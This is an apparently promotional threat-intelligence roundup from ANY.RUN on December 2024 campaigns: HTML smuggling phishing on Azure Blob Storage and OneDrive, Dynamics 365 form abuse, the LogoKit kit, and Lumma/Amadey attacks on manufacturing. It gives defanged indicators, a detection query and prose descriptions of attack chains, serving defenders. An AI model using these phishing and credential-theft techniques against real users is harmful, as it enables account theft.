The cybersecurity research team at ANY.RUN, leveraging their Interactive Sandbox and Threat Intelligence Lookup tools, has uncovered and analyzed a range of emerging threats throughout December 2024.
The team highlighted fascinating trends and vital insights into the evolving threat landscape targeting prominent platforms, including Microsoft services and the manufacturing industry.
1. Cybercriminals Exploiting Microsoft Azure Blob Storage in Phishing Campaigns
Phishing Pages Smuggling HTML Documents
A new phishing campaign revealed how attackers are exploiting Microsoft’s Azure Blob Storage service. These cleverly crafted phishing pages, hosted on the *.blob.core.windows[.]net subdomain, use HTML smuggling to steal user credentials.
Tactics and Techniques
- Phishing pages are HTML documents with unique identifiers like a block input element labeled with the ID “doom”.
- The pages use JScript to collect user-specific information (OS, browser) to increase credibility.
- Credentials entered on fake login pages are stolen via an HTTP POST request sent to a malicious website like
nocodeform[.]io. - Logos are dynamically pulled from the legitimate service
logo[.]clearbit[.]comto enhance authenticity.
See the analysis session in the ANY.RUN sandbox.
Despite a short lifespan for these phishing pages, the minimal malicious content in the hosted pages enables them to evade detection for longer periods.
Analysis and Defense
ANY.RUN’s Interactive Sandbox has detailed analysis sessions available for these attacks. Using Threat Intelligence Lookup, security professionals can track malicious URLs targeting Azure Blob Storage through specific domain queries as follows.
domainName:".blob.core.windows.net" and domainName:"aadcdn.msauth.net" and domainName:"cdnjs.cloudflare.com" and domainName:"www.w3schools.com"Try Get 20 free requests in TI Lookup to launch your threat investigations
2. Microsoft OneDrive: Another Target of HTML Blob Smuggling
Phishing Disguised as Legitimate File Sharing:
Attackers have extended their HTML smuggling tactics to Microsoft’s OneDrive service. Victims are lured in with a fake OneDrive login page, crafted to appear authentic.
Attack Chain Breakdown
- Users are baited through hyperlinks placed on OneDrive.
- After clicking the link, they are redirected to a page containing the smuggling code.
- Credentials entered are sent to a Command and Control (C2) server through an HTTP POST request.
- Victims are subsequently redirected to a legitimate website to cover the attack trail.
Key Findings
Visual assets, such as icons and backgrounds, are hosted on IPFS and imgur[.]com.
“After clicking the link, the user is redirected to the main page containing the HTML Blob Smuggling code. After entering their credentials, victims are redirected to a legitimate website.”
Base.js, a malicious script responsible for executing the attack, was extracted and decoded using ANY.RUN’s MITM (Man-in-the-Middle) feature.
Analyze malicious files and links with ANY.RUN’s Interactive Sandbox for free - Get 14 Days Free Trial
3. Phishing Links Embedded in Microsoft Dynamics 365 Forms
Threat actors have turned Microsoft Dynamics 365 web forms into phishing tools by embedding malicious links. The seemingly legitimate URLs, hosted on microsoft.com’s subdomains, trick users into visiting fake pages.
Real-World Example
A typical phishing link might resemble:hxxps://customervoice.microsoft[.]com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR...
The malicious page, mimicking a PDF download hosted on Microsoft’s services, deceives users into sharing sensitive information.
ANY.RUN’s Threat Intelligence tools can help uncover such attacks, allowing organizations to search for and analyze malicious forms in their sandbox environment.
4. LogoKit Phishing Framework Evolves
Modus Operandi of LogoKit
The widely-used LogoKit phishing toolkit exploits services offering dynamic logos and screenshots.
Its streamlined yet deceptive approach includes:
- Fetching company logos from
logo[.]clearbit[.]combased on user-entered email domains. - Hosting malicious scripts, styles, and images on platforms like Cloudflare Pages.
- Redirecting victims through decoy domains, such as a fake Asian grocery store site (
asiangrocers[.]store), to evade detection.
Scripts and Data Theft
Three obfuscated JavaScript files were discovered, tasked with:
- Preventing page analysis.
- Collecting stolen credentials, which are then sent to the attackers’ C2 infrastructure through HTTP POST requests.
5. Targeted Attacks on the Manufacturing Industry: Lumma and Amadey Malware
December brought alarming news for industrial players as a combined attack leveraging Lumma Stealer and Amadey Bot was uncovered.
This sophisticated campaign focuses on stealing sensitive information and taking control of critical systems, posing a grave risk to the manufacturing sector.
Attack Chain Analysis
- Phishing emails contain URLs leading to LNK files disguised as PDFs.
- When activated, the LNK file initiates PowerShell via
ssh.exe, triggering the download of a malicious CPL file. - WMI (Windows Management Instrumentation) and PowerShell scripts gather extensive victim system information.
The coordinated use of Lumma (for data theft) and Amadey (for system control) emphasizes the growing complexity of attacks targeting industrial environments.
About ANY.RUN
ANY.RUN is empowering over 500,000 cybersecurity professionals worldwide with its cutting-edge tools for malware analysis and threat intelligence.
Its Interactive Sandbox allows real-time malware interaction, while Threat Intelligence Lookup helps identify Indicators of Compromise (IOCs) and streamline incident response. With features like YARA Search, Feeds, and team collaboration, ANY.RUN is helping organizations stay ahead of evolving threats.
ANY.RUN Highlights
- Detect malware in seconds.
- Simulate and analyze threats in real-time.
- Scale sandbox environments effortlessly.
- Share findings and collaborate across teams.
Free Malware Research From ANY.RUN – Get 14-day free trial.